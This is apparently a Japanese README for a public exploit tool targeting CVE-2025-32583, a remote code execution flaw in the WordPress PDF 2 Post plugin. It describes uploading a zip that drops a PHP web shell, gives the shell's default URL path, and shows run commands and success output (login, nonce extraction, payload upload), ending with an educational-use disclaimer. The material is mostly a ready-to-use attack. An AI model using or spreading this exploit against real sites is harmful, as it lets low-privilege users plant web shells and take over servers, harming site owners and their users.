
WordPress PDF 2 Postプラグイン <= 2.4.0 は、リモートコード実行(RCE)+購読者 の脆弱性があります
CRITICAL Vulnerability
CVE-ID: CVE-2025-32583
重要度: 9.9 (CRITICAL)
CVSSベクトル:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
PDF 2 Post WordPressプラグイン(termel開発)に、コード生成の不適切な制御(Improper Control of Generation of Code)による**リモートコードインクルージョン(RCE)**の脆弱性があります。
影響を受けるバージョン: <= 2.4.0
この欠陥により、認証済みユーザー(低権限ユーザーでも)がPHPコードを含む.zipをアップロードできます。プラグインがそれを展開すると、悪意のあるPHPファイルが公開アップロードディレクトリを介してリモートで実行される可能性があります。
Nxploited.zipを自動生成nonceトークンを抽出ペイロードがアップロードされると、PHPシェルはWordPressのアップロードフォルダに展開されます。
🛠️ デフォルトパス:
/wp-content/uploads/YYYY/MM/nxploited.php
例えば、2025年5月に悪用した場合、URLは次のようになります:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 WordPressはアップロードを年/月ごとに自動整理するため、現在の日付に基づいて正しいフォルダを確認してください。
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
このツールは教育目的および許可された侵入テストにのみ使用することを意図しています。
許可されていない活動にこのコードを悪用することは固く禁じられています。
作者は、いかなる損害や悪用についても一切の責任を負いません。
By: Khaled_alenazi (Nxploited)